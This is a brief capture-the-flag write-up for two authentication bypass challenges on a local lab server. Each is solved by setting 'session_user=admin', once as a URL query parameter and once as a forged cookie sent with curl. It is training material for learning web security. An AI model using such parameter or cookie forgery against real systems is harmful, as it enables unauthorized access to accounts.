Authenication Bypass¶
Authentication Bypass 1¶
cat /challenge/server
The GET request accepts a query param "session_user" / If it is absent, login page is displayed. If present and equal to "admin" flag is displayed /
Just go to http://challenge.localhost/?session_user=admin
Authentication Bypass 2¶
cat /challenge/server
The GET request expects a cookie "session_user" / If it is absent, login page is displayed. If present and equal to "admin" flag is displayed /
curl -v --cookie "session_user=admin" http://challenge.localhost/